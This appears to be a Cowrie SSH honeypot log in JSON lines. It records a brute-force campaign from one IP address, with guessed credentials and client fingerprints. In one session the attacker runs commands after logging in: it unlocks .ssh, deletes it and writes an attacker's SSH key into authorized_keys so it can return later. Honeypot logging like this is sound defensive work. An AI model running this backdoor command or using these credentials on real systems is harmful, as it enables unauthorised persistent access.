nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:08.927403Z","src_ip":"212.227.235.229","session":"e0d267b6154e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:36:09.868298Z","src_ip":"212.227.235.229","session":"e0d267b6154e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:11.107927Z","src_ip":"212.227.235.229","session":"e0d267b6154e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55014,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d560e245aab","protocol":"ssh","message":"New connection: 212.227.235.229:55014 (1.2.3.4:22) [session: 8d560e245aab]","sensor":"my-vps","timestamp":"2025-09-09T01:36:11.339650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:11.341582Z","src_ip":"212.227.235.229","session":"8d560e245aab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:11.573867Z","src_ip":"212.227.235.229","session":"8d560e245aab"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:36:12.514165Z","src_ip":"212.227.235.229","session":"8d560e245aab"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:12.752924Z","src_ip":"212.227.235.229","session":"a1c9b2f5228a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:12.753830Z","src_ip":"212.227.235.229","session":"8d560e245aab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56184,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb89d2599f02","protocol":"ssh","message":"New connection: 212.227.235.229:56184 (1.2.3.4:22) [session: cb89d2599f02]","sensor":"my-vps","timestamp":"2025-09-09T01:36:22.525414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:22.526310Z","src_ip":"212.227.235.229","session":"cb89d2599f02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:22.781522Z","src_ip":"212.227.235.229","session":"cb89d2599f02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37596,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc82106c90a9","protocol":"ssh","message":"New connection: 212.227.235.229:37596 (1.2.3.4:22) [session: bc82106c90a9]","sensor":"my-vps","timestamp":"2025-09-09T01:36:23.689308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:23.694589Z","src_ip":"212.227.235.229","session":"bc82106c90a9"}
{"eventid":"cowrie.login.failed","username":"tests","password":"tests123","message":"login attempt [tests/tests123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:36:23.844607Z","src_ip":"212.227.235.229","session":"cb89d2599f02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51132,"dst_ip":"1.2.3.4","dst_port":22,"session":"b019d7b2415a","protocol":"ssh","message":"New connection: 212.227.235.229:51132 (1.2.3.4:22) [session: b019d7b2415a]","sensor":"my-vps","timestamp":"2025-09-09T01:36:24.077252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:24.078046Z","src_ip":"212.227.235.229","session":"b019d7b2415a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:24.184920Z","src_ip":"212.227.235.229","session":"bc82106c90a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:24.336310Z","src_ip":"212.227.235.229","session":"b019d7b2415a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:25.101935Z","src_ip":"212.227.235.229","session":"cb89d2599f02"}
{"eventid":"cowrie.login.failed","username":"user1","password":"12345","message":"login attempt [user1/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:36:25.410367Z","src_ip":"212.227.235.229","session":"b019d7b2415a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:26.671064Z","src_ip":"212.227.235.229","session":"b019d7b2415a"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"password123","message":"login attempt [raspberry/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:36:30.843127Z","src_ip":"212.227.235.229","session":"bc82106c90a9"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:32.098174Z","src_ip":"212.227.235.229","session":"bc82106c90a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58886,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e0b36c68859","protocol":"ssh","message":"New connection: 212.227.235.229:58886 (1.2.3.4:22) [session: 2e0b36c68859]","sensor":"my-vps","timestamp":"2025-09-09T01:36:47.307136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:47.308170Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:47.426786Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.login.success","username":"root","password":"123QWEasdzxc","message":"login attempt [root/123QWEasdzxc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:36:47.940099Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:36:48.197779Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.198570Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.199962Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.319752Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:36:48.658275Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.659023Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.779454Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.780266Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58892,"dst_ip":"1.2.3.4","dst_port":22,"session":"71361c10dbf6","protocol":"ssh","message":"New connection: 212.227.235.229:58892 (1.2.3.4:22) [session: 71361c10dbf6]","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.899384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:48.900285Z","src_ip":"212.227.235.229","session":"71361c10dbf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:49.020812Z","src_ip":"212.227.235.229","session":"71361c10dbf6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:36:49.543570Z","src_ip":"212.227.235.229","session":"71361c10dbf6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:50.665620Z","src_ip":"212.227.235.229","session":"71361c10dbf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58906,"dst_ip":"1.2.3.4","dst_port":22,"session":"d678043dd065","protocol":"ssh","message":"New connection: 212.227.235.229:58906 (1.2.3.4:22) [session: d678043dd065]","sensor":"my-vps","timestamp":"2025-09-09T01:36:50.784466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:50.785099Z","src_ip":"212.227.235.229","session":"d678043dd065"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:50.904907Z","src_ip":"212.227.235.229","session":"d678043dd065"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:36:51.425098Z","src_ip":"212.227.235.229","session":"d678043dd065"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:51.544963Z","src_ip":"212.227.235.229","session":"2e0b36c68859"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:36:51.546108Z","src_ip":"212.227.235.229","session":"d678043dd065"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36526,"dst_ip":"1.2.3.4","dst_port":22,"session":"573dd0220c0e","protocol":"ssh","message":"New connection: 212.227.235.229:36526 (1.2.3.4:22) [session: 573dd0220c0e]","sensor":"my-vps","timestamp":"2025-09-09T01:36:59.723970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:36:59.724621Z","src_ip":"212.227.235.229","session":"573dd0220c0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:36:59.965984Z","src_ip":"212.227.235.229","session":"573dd0220c0e"}
{"eventid":"cowrie.login.failed","username":"support","password":"111","message":"login attempt [support/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:37:00.971836Z","src_ip":"212.227.235.229","session":"573dd0220c0e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:37:02.216431Z","src_ip":"212.227.235.229","session":"573dd0220c0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59488,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fa453db8f60","protocol":"ssh","message":"New connection: 212.227.235.229:59488 (1.2.3.4:22) [session: 8fa453db8f60]","sensor":"my-vps","timestamp":"2025-09-09T01:37:09.617057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:37:09.618190Z","src_ip":"212.227.235.229","session":"8fa453db8f60"}
